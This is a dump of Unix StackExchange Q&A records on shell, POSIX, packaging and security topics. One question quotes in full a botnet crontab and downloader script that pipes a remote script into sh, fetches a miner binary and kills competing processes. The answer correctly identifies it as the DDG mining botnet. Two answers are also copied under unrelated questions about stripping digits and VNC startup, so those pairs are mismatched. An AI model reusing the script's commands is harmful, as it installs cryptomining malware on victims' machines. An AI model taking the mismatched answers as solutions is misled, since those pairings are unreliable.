538,844 | From C, what's the easiest way to run a standard utility (e.g., ps) and no other? Does POSIX guarantee that, for example, a standard ps is in /bin/ps or should I reset the PATH environment variable to what I get with confstr(_CS_PATH, pathbuf, n); and then run the utility through PATH-search? | No, it doesn't, mainly for the reason that it doesn't require systems to conform by default , or to comply to only the POSIX standard (to the exclusion of any other standard). For instance, Solaris (a certified compliant system) chose backward compatibility for its utilities in /bin , which explains why those behave in arcane ways, and provide POSIX-compliant utilities in separate locations ( /usr/xpg4/bin , /usr/xpg6/bin ... for different versions of the XPG (now merged into POSIX) standard, those being actually part of optional components in Solaris). Even sh is not guaranteed to be in /bin . On Solaris, /bin/sh used to be the Bourne shell (so not POSIX compliant) until Solaris 10, while it's now ksh93 in Solaris 11 (still not fully POSIX compliant, but in practice more so than /usr/xpg4/bin/sh ). From C, you could use exec*p() and assume you're in a POSIX environment (in particular regarding the PATH environment variable). You could also set the PATH environment variable #define _POSIX_C_SOURCE=200809L /* before any #include */
...
confstr(_CS_PATH, buf, sizeof(buf)); /* maybe append the original
* PATH if need be */
setenv("PATH", buf, 1);
exec*p("ps"...); Or you could determine at build time the path of the POSIX utilities you want to run (bearing in mind that on some systems like GNU ones, you need more steps like setting a POSIXLY_CORRECT variable to ensure compliance). You could also try things like: execlp("sh", "sh", "-c", "PATH=`getconf PATH`${PATH+:$PATH};export PATH;"
"unset IFS;shift \"$1\";"
"exec ${1+\"$@\"}", "2", "1", "ps", "-A"...); In the hope that there's a sh in $PATH , that it is Bourne-like, that there's also a getconf and that it's the one for the version of POSIX you're interested in. | {
"source": [
"https://unix.stackexchange.com/questions/538844",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/23692/"
]
} |
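The shell-level counterpart of the C fragments above is worth keeping in mind as a sketch: command -p searches a default PATH that is guaranteed to find the standard utilities, and getconf PATH prints that same value.
#!/bin/sh
# Run one standard utility without trusting the caller's PATH:
command -p ps -A

# Or switch the whole script over to the implementation-provided default PATH:
PATH=$(getconf PATH)${PATH:+:$PATH}
export PATH
ps -A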
539,823 | I did a few research, I can split the string by '.' but the only thing I want to replace is the third '.', and the version number is actually variable so how can I do the replace/split? version: 1.8.0.110 but What I want is the output like this: version: 1.8.0-110 | Used sed for example: $ echo 'version: 1.8.0.110' | sed 's/\./-/3'
version: 1.8.0-110 Explanation: sed s/search/replace/x searches for a string and replaces it with another string. x determines which occurence to replace - here the 3rd. Often g is used for x to mean all occurances. Here we wish to replace the dot . but this is a special character in the regular expression sed expects in the search term. Therefore we backslashify the . to \. to specify a literal . . Since we use special characters in the argument to sed (here, the backslash \ ) we need to put the whole argument in single quotes '' . Many people always use quotes here so as not to run into problems when using characters that might be special to the shell (like space ). | {
"source": [
"https://unix.stackexchange.com/questions/539823",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/370424/"
]
} |
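When the version string always has exactly three dots, the third dot is also the last one, so plain parameter expansion works too; a sketch using the example value from the question:
#!/bin/sh
line='version: 1.8.0.110'
printf '%s\n' "${line%.*}-${line##*.}"    # prints: version: 1.8.0-110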
541,342 | Say I have a POSIX shell script that needs to run on different systems/environments that I do not control, and needs to remove the decimal separator from a string that is emitted by a program that respects the locale settings. How can I detect the decimal separator in the most general way? | Ask locale : locale decimal_point This will output the decimal point using the current locale settings. If you need the thousands separator: locale thousands_sep You can view all the numeric keywords by requesting the LC_NUMERIC category : locale -k LC_NUMERIC | {
"source": [
"https://unix.stackexchange.com/questions/541342",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/164535/"
]
} |
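Using the looked-up separator to actually strip it from a number could look like this sketch; $value stands in for the locale-formatted output of the real program:
#!/bin/sh
dp=$(locale decimal_point)
value="1234${dp}56"                        # e.g. "1234.56" or "1234,56"
printf '%s\n' "$value" | tr -d "$dp"       # prints: 123456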
541,779 | There's no directory above / , so what's the point of the .. in it? | The .. entry in the root directory is a special case. From the POSIX standard ( 4.13 Pathname Resolution , where the . and .. entries are referred to as "dot" and "dot-dot" repsectively): The special filename dot shall refer to the directory specified by its predecessor. The special filename dot-dot shall refer to the parent directory of its predecessor directory. As a special case, in the root directory, dot-dot may refer to the root directory itself. The rationale has this to add ( A.4.13 Pathname Resolution ) What the filename dot-dot refers to relative to the root directory is implementation-defined. In Version 7 it refers to the root directory itself; this is the behavior mentioned in POSIX.1-2017. In some networked systems the construction /../hostname/ is used to refer to the root directory of another host, and POSIX.1 permits this behavior. Other networked systems use the construct //hostname for the same purpose; that is, a double initial <slash> is used. [...] So, in short, the POSIX standard says that every directory should have both . and .. entries, and permits the .. directory entry in / to refer to the / directory itself (notice the word "may" in the first text quoted), but it also allows an implementation to let it refer to something else. Most common implementations of filesystems makes /.. resolve to / . | {
"source": [
"https://unix.stackexchange.com/questions/541779",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/85900/"
]
} |
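A quick check on any machine makes the special case visible: if /.. resolves back to /, both paths report the same inode number.
#!/bin/sh
ls -id / /.. /../..
# typical output: identical inode numbers for all three, i.e. the same directory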
541,795 | I have used ln to write symbolic links for years but I still get the order of parameters the wrong way around. This usually has me writing: ln -s a b and then looking at the output to remind myself. I always imagine it to be a -> b as I read it when it's actually the opposite b -> a. This feels counter-intuitive so I find that I'm always second-guessing myself. Does anyone have any tips to help me remember the correct order? | I use the following: ln has a one-argument form (2nd form listed in the manpage) in which only the target is required (because how could ln work at all without knowing the target) and ln creates the link in the current directory. The two-argument form is an addition to the one-argument form, thus the target is always the first argument. | {
"source": [
"https://unix.stackexchange.com/questions/541795",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/81989/"
]
} |
542,989 | When did Unix move away from storing clear text passwords in passwd? Also, when was the shadow file introduced? | For the early history of Unix password storage, read Robert Morris and Ken Thompson's Password Security: A Case History . They explain why and how early Unix systems acquired most the features that are still seen today as the important features of password storage (but done better). The first Unix systems stored passwords in plaintext. Unix Third Edition introduced the crypt function which hashes the password. It's described as “encryption” rather than “hashing” because modern cryptographic terminology wasn't established yet and it used an encryption algorithm, albeit in an unconventional way. Rather than encrypt the password with a key, which would be trivial to undo when you have the key (which would have to be stored on the system), they use the password as the key. When Unix switched from an earlier cipher to the then-modern DES , it was also made slower by iterating DES multiple times. I don't know exactly when that happened: V6? V7? Merely hashing the password is vulnerable to multi-target attacks: hash all the most common passwords once and for all, and look in the password table for a match. Including a salt in the hashing mechanism, where each account has a unique salt, defeats this precomputation. Unix acquired a salt in Seventh Edition in 1979 . Unix also acquired password complexity rules such as a minimum length in the 1970s. Originally the password hash was in the publicly-readable file /etc/passwd . Putting the hash in a separate file /etc/shadow that only the system (and the system administrator) could access was one of the many innovations to come from Sun, dating from around SunOS 4 in the mid-1980s. It spread out gradually to other Unix variants (partly via the third party shadow suite whose descendent is still used on Linux today) and wasn't available everywhere until the mid-1990s or so. Over the years, there have been improvements to the hashing algorithm. The biggest jump was Poul-Henning Kamp's MD5-based algorithm in 1994, which replaced the DES-based algorithm by one with a better design. It removed the limitation to 8 password characters and 2 salt characters and had increased slowness. See IEEE's Developing with open source software , Jan–Feb. 2004, p. 7–8 . The SHA-2-based algorithms that are the de facto standard today are based on the same principle, but with slightly better internal design and, most importantly, a configurable slowness factor. | {
"source": [
"https://unix.stackexchange.com/questions/542989",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/373706/"
]
} |
543,013 | For example, there's https://aur.archlinux.org/packages/github-desktop/ , https://aur.archlinux.org/packages/github-desktop-bin/ , and https://aur.archlinux.org/packages/github-desktop-git/ . I took a look at the pkgbuilds and found no easily identifiable difference between the packages. This isn't just one package, but many of them. What's the difference between them? Which one should I install? | Normal packages are built from stable versions or stable git tags of a repository. The program is compiled on the user's machine and then installed. This will take time. Packages with the -bin suffix are already built by the upstream maintainer and made available somewhere, so users do not have to compile the package on their machine. The PKGBUILD script downloads, extracts and installs the files. Some proprietary software is released in this format where the source code is not available. Packages with the -git suffix are built from the latest commit of the git repository, whether it is stable or not. This way the user gets the latest fixes or patches. This is also compiled on the user's machine, then installed. The difference among the AUR packages can easily be understood from their corresponding PKGBUILD files (shell-script-like) in the source() function. Here is an example: For github-desktop the source is a stable git release tag: pkgver=x.y.z
_pkgver="${pkgver}-linux1"
gitname="release-${_pkgver}"
https://github.com/shiftkey/desktop.git#tag=${gitname} For github-desktop-bin the source is an already packed Debian package: pkgver=x.y.z
_pkgver="${pkgver}-linux1"
gitname="release-${_pkgver}"
https://github.com/shiftkey/desktop/releases/download/${gitname}/GitHubDesktop-linux-${_pkgver}.deb For github-desktop-git the source is the latest master branch: https://github.com/shiftkey/desktop.git Further reading: Arch Wiki: Arch User Repository (AUR) Manjaro Forum: The difference between bin and non bin packages
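Whichever variant you choose, the build-and-install steps are the same (a sketch using plain git and makepkg; AUR helpers such as yay automate this, and the package name here is just the example from the question):
git clone https://aur.archlinux.org/github-desktop-bin.git
cd github-desktop-bin
makepkg -si
makepkg runs the PKGBUILD (downloading or compiling as described above) and -si installs the result with pacman, pulling in dependencies first. | {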
"source": [
"https://unix.stackexchange.com/questions/543013",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/321803/"
]
} |
543,792 | In the bash shell, we can define a function f with f(){ echo Hello; } and then redeclare/override it, without any error or warning messages, with f(){ echo Bye; } I believe there is a way to protect functions from being overridden in this way. | You may declare a function foo as a read-only function using readonly -f foo or declare -g -r -f foo ( readonly is equivalent to declare -g -r ). It's the -f option to these built-in utilities that makes them act on foo as the name of a function, rather than on the variable foo . $ foo () { echo Hello; }
$ readonly -f foo
$ foo () { echo Bye; }
bash: foo: readonly function
$ unset -f foo
bash: unset: foo: cannot unset: readonly function
$ foo
Hello As you can see, making the function read-only not only protects it from getting overridden, but also protects it from being unset (removed completely). Currently (as of bash-5.0.11 ), trying to modify a read-only function would not terminate the shell if one is using the errexit shell option ( set -e ). Chet, the bash maintainer, says that this is an oversight and that it will be changed with the next release. Update: This was fixed during October 2019 for bash-5.1-alpha , so any bash release 5.1 or later would exit properly if an attempt to modify a read-only function is made while the errexit shell option is active. | {
"source": [
"https://unix.stackexchange.com/questions/543792",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/156608/"
]
} |
544,373 | I'm looking for the zsh equivalent of the bash command history -c , in other words, clear the history for the current session. In zsh history -c returns 1 with an error message history: bad option: -c . Just to clarify, I'm not looking for a way to delete the contents of $HISTFILE , I just want a command to reset the history to the same state it was in when I opened the terminal. Deleting the contents of $HISTFILE does the opposite of what I want: it deletes the history I want to preserve and preserves the history I want to delete (since current session's history would get appended to it, regardless if its contents was previously erased). There is a workaround I use for now, but it's obviously less than ideal: in the current session I set HISTFILE=/dev/null and just close and reopen the terminal. This causes the history of the closed session not be appended to $HISTFILE . However, I'd really like something like history -c from bash, which is much more elegant than having to close and restart the terminal. | To get an empty history, temporarily set HISTSIZE to zero. function erase_history { local HISTSIZE=0; }
erase_history If you want to erase the new history from this shell instance but keep the old history that was loaded initially, empty the history as above then reload the saved history fc -R afterwards. If you don't want the erase_history call to be recorded in the history, you can filter it out in the zshaddhistory hook . function zshaddhistory_erase_history {
[[ $1 != [[:space:]]#erase_history[[:space:]]# ]]
}
zshaddhistory_functions+=(zshaddhistory_erase_history) Deleting one specific history element ( history -d NUM in bash) is another matter. I don't think there's a way other than: Save the history: fc -AI to append to the history file, or fc -WI to overwrite the history file, depending on your history sharing preferences. Edit the history file ( $HISTFILE ). Reload the history file: fc -R . | {
"source": [
"https://unix.stackexchange.com/questions/544373",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/325952/"
]
} |
544,428 | I've noticed a lot of questions and answers and comments expressing disdain for (and sometimes even fear of) writing scripts instead of one-liners. So, I'd like to know: When and why should I write a stand-alone script rather than a "one-liner"? Or vice-versa? What are the use-cases and pros & cons of both? Are some languages (e.g. awk or perl) better suited to one-liners than others (e.g. python)? If so, why? Is it just a matter of personal preference or are there good (i.e. objective) reasons to write one or the other in particular circumstances? What are those reasons? Definitions one-liner : any sequence of commands typed or pasted directly into a shell command-line . Often involving pipelines and/or use of languages such as sed , awk , perl , and/or tools like grep or cut or sort . It is the direct execution on the command-line that is the defining characteristic - the length and formatting is irrelevant. A "one-liner" may be all on one line, or it may have multiple lines (e.g. sh for loop, or embedded awk or sed code, with line-feeds and indentation to improve readability). script : any sequence of commands in any interpreted language(s) which are saved into a file , and then executed. A script may be written entirely in one language, or it may be a shell-script wrapper around multiple "one-liners" using other languages. I have my own answer (which I'll post later), but I want this to become a canonical Q&A on the subject, not just my personal opinion. | Another response based on practical experience. I would use a one-liner if it was "throw away" code that I could write straight at the prompt. For example, I might use this: for h in host1 host2 host3; do printf "%s\t%s\n" "$h" "$(ssh "$h" uptime)"; done I would use a script if I decided that the code was worth saving. At this point I would add a description at the top of the file, probably add some error checking, and maybe even check it into a code repository for versioning. For example, if I decided that checking the uptime of a set of servers was a useful function that I would use again and again, the one-liner above might be expanded to this: #!/bin/bash
# Check the uptime for each of the known set of hosts
########################################################################
#
hosts=(host1 host2 host3)
for h in "${hosts[@]}"
do
printf "%s\t" "$h"
uptime=$(ssh -o ConnectTimeout=5 -n "$h" uptime 2>/dev/null)
printf "%s\n" "${uptime:-(unreachable)}"
done Generalising, one could say:
One-liner:
Simple code (i.e. just "a few" statements), written for a specific one-off purpose
Code that can be written quickly and easily whenever it is needed
Disposable code
Script:
Code that will (probably) be used more than once or twice
Complex code requiring more than "a few" statements
Code that will need to be maintained by others
Code to be understood by others
Code to be run unattended (for example, from cron )
I see a fair number of the questions here on unix.SE ask for a one-liner to perform a particular task. Using my examples above, I think that the second is far more understandable than the first, and therefore readers can learn more from it. One solution can be easily derived from the other so in the interests of readability (for future readers) we should probably avoid providing code squeezed into one line for anything other than the most trivial of solutions. | {
"source": [
"https://unix.stackexchange.com/questions/544428",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/7696/"
]
} |
544,432 | Scenario: In version controlled system configuration based on Puppet, Chef etc., it is required to reproduce a certain system state. This is done by explicitly specifying system package versions. Recently we ran into a problem where certain package versions were missing in the Debian repositories. One example: The "patch" package was required in version 2.7.5-1+deb9u1, but only 2.7.5-1+deb9u2 was available. Another, even more severe example: "linux-headers-4.9.0-9-common" is required (due to the associated kernel being installed) and only "linux-headers-4.9.0-11-common" is available. This makes it impossible to reproduce a certain state of a system. The above packages are just examples (which I in fact encountered). I am interested in understanding and solving the general problem. What is the idea behind these updates, 'vanishing' packages and package versions? Where can I get previous versions (not really old versions, but versions that are a couple of weeks old) of Debian packages? It should be possible to automate the installation process in general way. | Being able to reproduce a specific setup, down to the exact version, is your requirement, not Debian’s. Debian only supports a single version of each binary package in any given release; the counterpart of that is that great care is taken to ensure that package updates in any given release don’t introduce regressions, and when such care isn’t possible, to document that fact. Keeping multiple versions of a given package would only increase the support burden and the test requirements: for example, package maintainers would have to test updated packages against all available versions of the libraries they use, instead of only the currently-supported versions... Packages are only updated in a stable release when really necessary, i.e. to fix a serious bug (including security issues). In the kernel’s case, this sometimes means that the kernel ABI changes, and the package name changes as a result of that (to force rebuilds of dependent packages); there are meta-packages which you can pull in instead of hard-coding the ABI ( linux-image-amd64 , linux-headers-amd64 , etc.). There is however a workaround for your situation: every published source and binary package is archived on snapshot.debian.org . When you create a versioned setup, you can pick the corresponding snapshot (for example, one of the September 2019 snapshots ) and use that as your repository URL: deb https://snapshot.debian.org/archive/debian/20190930T084755Z/ buster main If you end up relying on this, please use a caching mirror of some sort, for example Apt-Cacher NG . This will not only reduce the load on the snapshot server, it will ensure that you have a local copy of all the packages you need. (The situation with regards to source packages is slightly more complex, and the archives do carry multiple versions of some source packages in a given release, because of licensing dependencies. But that’s not relevant here. Strictly speaking, Debian does provide multiple versions of some binaries in supported releases: the current version in the current point release, along with any updates in the security repositories and update repositories; the latter are folded in at the next point release. So maintaining a reproducible, version-controlled system configuration is feasible without resorting to snapshots, as long as you update it every time a point release is made.) | {
"source": [
"https://unix.stackexchange.com/questions/544432",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/332954/"
]
} |
544,811 | I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing. Crontab entry: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh The contents of http://103.219.112.66:8000/i.sh are: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab - My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual. What is this? What should I do? | It is a DDG mining botnet. How it works: it exploits an RCE vulnerability, modifies the crontab, downloads the appropriate mining program (written in Go), and starts the mining process. See: DDG: A Mining Botnet Aiming at Database Servers SystemdMiner when a botnet borrows another botnet’s infrastructure U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server) | {
"source": [
"https://unix.stackexchange.com/questions/544811",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/141058/"
]
} |
544,887 | What sed/awk command can I use? Just sort -u will remove all instances Input: abc
abc
def
abc
abc
def Expected output: abc
def
abc
def | That's what the uniq standard command is for. uniq your-file Note that some uniq implementations like GNU uniq will give you the first of a sequence of lines that sort the same (where strcoll() returns 0) as opposed to ones that are byte-to-byte identical (where memcmp() or strcmp() returns 0). To force a byte-to-byte comparison regardless of the uniq implementation, you can force the locale to C with: LC_ALL=C uniq your-file
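Run against the sample from the question (assuming it is saved in a file called file), this collapses adjacent duplicates while keeping the non-adjacent ones, which is exactly the expected output:
$ uniq file
abc
def
abc
def | {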
"source": [
"https://unix.stackexchange.com/questions/544887",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/365562/"
]
} |
545,508 | I'm currently trying to set up an SSH server so that access to it from outside the network is ONLY allowed using an SSH Key and does not allow access to root or by any other username/password combination. At the same time, internal users inside the network, still need to be able to connect to the same system, but expect to log in in the more traditional sense with a user name and password. Users both external & internal will be accessing the system from windows using PuttySSH and the external access will be coming into the system via a port forwarding firewall that will open the source port to the outside world on some arbitrarily chosen high numbered port like 55000 (or what ever the admins decide) The following diagram attempts to show the traffic flows better. I know how to set up the actual login to only use keys, and I know how to deny root, what I don't know is how to separate the two login types. I had considered running two copies of SSHD listening on different ports on the same IP and having two different configurations for each port. I also considered setting up a "match" rule, but I'm not sure if I can segregate server wide configurations using those options. Finally, the external person logging in will always be the same user let's call them "Frank" for the purposes of this question, so "Frank" will only ever be allowed to log in from the external IP, and never actually be sat in front of any system connecting internally, where as every other user of the system will only ever connect internally, and never connect from an external IP. Franks IP that he connects from is a dynamically assigned one but the public IP he is connecting too is static and will never change, the internal IP of the port forwarder like wise will also never change and neither will the internal IP address of the SSH server. Internal clients will always connect from an IP in the private network range that the internal SSH servers IP is part of and is a 16 bit mask EG: 192.168.0.0/16 Is this set up possible, using one config file and one SSH server instance? If so, how do I do it? or Am I much better using 2 running servers with different config? For ref the SSH server is running on Ubuntu 18.04. | So, it turns out the answer was actually way, way simpler than I thought it would be. I do however have to thank '@jeff schaller' for his comments, if it hadn't of been for him I wouldn't have started looking into how the SSH 'Match' configuration works. Anyway The trick is to set your /etc/ssh/sshd_config file up as default to be the configuration you would like to have for the access coming in from the external internet connection. In my case, this meant setting the following PermitRootLogin no
PasswordAuthentication no
UsePAM no By doing this, I'm forcing ALL logins no matter where they come from to need to be key based logins using an SSH key. I then on the windows machines used 'PuttyGen' to generate a public/private key pair which I saved to disk, and an appropriate ssh entry for my "authorized_hosts" file in the external users home directory. I pasted this ssh key into the correct place in my users home folder, then set putty up to use the private (ppk) file generated by PuttyGen for log in and saved the profile. I then saved the profile, and sent that and the ppk key file to the external user using a secure method (Encrypted email with a password protected zip file attached) Once the user had the ppk and profile in their copy of putty and could log in, I then added the following as the last 2 lines on my sshd_config file Match Host server1,server1.internalnet.local,1.2.3.4
PasswordAuthentication yes In the "Match" line I've changed the server names to protect the names of my own servers. Note each server domain is separated by a comma and NO SPACES, this is important. If you put any spaces in it causes SSHD to not load the config and report an error, the 3 matches I have in there do the following: server1 - matches on anyone using just 'server1' with no domain to connect EG: 'fred@server1' server1.internalnet.local - matches on anyone using the fully qualified internal domain name EG: '[email protected]' (NOTE: you will need an internal DNS to make this work correctly) 1.2.3.4 - matches on the specific I.P. address assigned to the SSH server EG: '[email protected]' this can use wild cards, or even better net/mask cidr format EG: 1.2.* or 192.168.1.0/8 if you do use wild cards however, please read fchurca's answer below for some important notes. If any of the patterns provided match the host being accessed, then the one and only single change to be made to the running config is to turn back on the ability to have an interactive password login. You can also put other config directives in here too, and those directives will also be turned back on for internal hosts listed in the match list. do however read this: https://man.openbsd.org/OpenBSD-current/man5/ssh_config.5 carefully, as not every configuration option is allowed to be used inside a match block, I found this out when I tried to "UsePAM yes" to turn PAM authentication back on, only to be told squarely that wasn't allowed. Once you've made your changes, type sshd -T followed by return to test them before attempting to restart the server, it'll report any errors you have. In addition to everything above, I got a lot of help from the following two links too: https://raymii.org/s/tutorials/Limit_access_to_openssh_features_with_the_Match_keyword.html https://www.cyberciti.biz/faq/match-address-sshd_config-allow-root-loginfrom-one_ip_address-on-linux-unix/ | {
"source": [
"https://unix.stackexchange.com/questions/545508",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/72591/"
]
} |
545,699 | Has anyone used the gold linker before? To link a fairly large project, I had to use this as opposed to the GNU ld , which threw up a few errors and failed to link. How is the gold linker able to link large projects where ld fails? Is there some kind of memory trickery somewhere? | The gold linker was designed as an ELF-specific linker, with the intention of producing a more maintainable and faster linker than BFD ld (the “traditional” GNU binutils linker). As a side-effect, it is indeed able to link very large programs using less memory than BFD ld , presumably because there are fewer layers of abstraction to deal with, and because the linker’s data structures map more directly to the ELF format. I’m not sure there’s much documentation which specifically addresses the design differences between the two linkers, and their effect on memory use. There is a very interesting series of articles on linkers by Ian Lance Taylor, the author of the various GNU linkers, which explains many of the design decisions leading up to gold . He writes that The linker I am now working, called gold, on will be my third. It is exclusively an ELF linker. Once again, the goal is speed, in this case being faster than my second linker. That linker has been significantly slowed down over the years by adding support for ELF and for shared libraries. This support was patched in rather than being designed in. (The second linker is BFD ld .) | {
"source": [
"https://unix.stackexchange.com/questions/545699",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/345639/"
]
} |
545,909 | I have a file in the name of Build.number with the content value 012 which I need to increment by +1.
So, I tried this BN=$($cat Build.number)
BN=$(($BN+1))
echo $BN >Build.number but here I am getting the value 11 when I am expecting 013 .
Can anyone help me? | The leading 0 causes Bash to interpret the value as an octal value ; 012 octal is 10 decimal, so you get 11. To force the use of decimal, add 10# (as long as the number has no leading sign): BN=10#$(cat Build.number)
echo $((++BN)) > Build.number To print the number using at least three digits, use printf : printf "%.3d\n" $((++BN)) > Build.number
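A quick interactive demonstration of the difference the 10# prefix makes, and of the zero-padded printf format:
$ BN=012; echo $((BN + 1))
11
$ BN=012; echo $((10#$BN + 1))
13
$ printf '%.3d\n' 13
013 | {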
"source": [
"https://unix.stackexchange.com/questions/545909",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/376375/"
]
} |
545,914 | I have the following input file H1
C1
C2
C3
H2
C4
.
.
. I would like to obtain the following output format only with the characters and not the numbers H
C
C
C
H
C
.
.
. | The leading 0 causes Bash to interpret the value as an octal value ; 012 octal is 10 decimal, so you get 11. To force the use of decimal, add 10# (as long as the number has no leading sign): BN=10#$(cat Build.number)
echo $((++BN)) > Build.number To print the number using at least three digits, use printf : printf "%.3d\n" $((++BN)) > Build.number | {
"source": [
"https://unix.stackexchange.com/questions/545914",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/298739/"
]
} |
547,968 | -b, --before The separator is attached to the beginning of the record that it
precedes in the file. And I can't understand the following output: $ echo -e "Hello\nNew\nWorld\n!" > file
$ tac file
!
World
New
Hello
$ tac -b file
!
World
NewHello Why there is no newline between New and Hello ? | tac works with records and their separators, attached , by default after the corresponding record. This is somewhat counter-intuitive compared to other record-based tools (such as AWK) where separators are detached. With -b , the records, with their newline attached, are as follows (in original order): Hello \nNew \nWorld \n! \n Output in reverse, this becomes \n\n!\nWorld\nNewHello which corresponds to the output you see. Without -b , the records, with their newline attached, are as follows: Hello\n New\n World\n !\n Output in reverse, this becomes !\nWorld\nNew\nHello\n | {
"source": [
"https://unix.stackexchange.com/questions/547968",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/223016/"
]
} |
548,002 | How can I use, preferably a single chmod command, which will allow any user to create a file in a directory but only the owner of their file (the user who created it) can delete their own file but no one else's in that directory. I was thinking to use: chmod 755 directory As the user can create a file and delete it, but won't that allow the user to delete other people's files? I only want the person who created the file to be able to delete their own file. So, anyone can make a file but only the person who created a file can delete that file (in the directory). | The sticky bit can do more or less what you want. From man 1 chmod : The restricted deletion flag or sticky bit is a single bit, whose interpretation depends on the file type. For directories, it prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories like /tmp. That is, the sticky bit's presence on a directory only allows contained files to be renamed or deleted if the user is either the file's owner or the containing directory's owner (or the user is root). You can apply the sticky bit (which is represented by octal 1000, or t ) like so: # instead of your chmod 755
chmod 1777 directory
# or, to add the bit to an existing directory
chmod o+t directory
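To verify the result, the sticky bit shows up as a t in the last position of the directory's mode (sample output; owner, size and date will of course differ):
$ ls -ld directory
drwxrwxrwt 2 alice alice 4096 Nov 19 10:00 directory | {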
"source": [
"https://unix.stackexchange.com/questions/548002",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/322247/"
]
} |
548,700 | There is a thread that talks about ls "*" not showing any files, but I actually wonder why the simple ls * command doesn't output anything in my terminal other than ls: invalid option -- '|'
Try 'ls --help' for more information. while ls will list all the files in the current directories as 1 ferol readme.txt
2 fichier sarku
2018 GameShell Templates
22223333 '-|h4k3r|-' test
3 hs_err_pid2301.log test2
CA.txt important.top.secret.txt toto.text
CA.zip JavaBlueJProject tp1_inf1070
countryInfo.txt liendur 'tp1_inf1070_A19(2) (1)'
currency liensymbolique tp1_inf1070_A19.tar
curreny LOL Videos
Desktop Longueuil 'VirtualBox VMs'
Documents Music words
douffos numbers Zip.zip
Downloads Pictures
examples.desktop Public Any ideas as to why the globbing doesn't take effect here? I'm on Ubuntu, working in the terminal, I don't know if it makes a difference. Thanks. | When you run ls * globbing takes effect as usual, and the * expands to all filenames in the current directory -- including this one: -|h4k3r|- That starts with a - , so ls tries to parse it as an option (like -a or -l ). As | isn't actually an option recognized by ls , it complains with the error message invalid option , then exits (without listing any files). If you want to list everything in the current folder explicitly, instead try ls ./* ...which will prefix all filenames with ./ (so that entry will not be misinterpreted as an option), or ls -- * ...where -- is the "delimiter indicating end of options", ie. any remaining arguments are filenames. | {
"source": [
"https://unix.stackexchange.com/questions/548700",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/378955/"
]
} |
548,704 | I'm trying different .xstartup files to have KDE come up when using tightvncserver, but I keep on seeing the empty screen. Any help? Current .xstartup is: #!/bin/sh
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
vncconfig -iconic &
dbus-launch --exit-with-session gnome-session &
startkde & | When you run ls * globbing takes effect as usual, and the * expands to all filenames in the current directory -- including this one: -|h4k3r|- That starts with a - , so ls tries to parse it as an option (like -a or -l ). As | isn't actually an option recognized by ls , it complains with the error message invalid option , then exits (without listing any files). If you want to list everything in the current folder explicitly, instead try ls ./* ...which will prefix all filenames with ./ (so that entry will not be misinterpreted as an option), or ls -- * ...where -- is the "delimiter indicating end of options", ie. any remaining arguments are filenames. | {
"source": [
"https://unix.stackexchange.com/questions/548704",
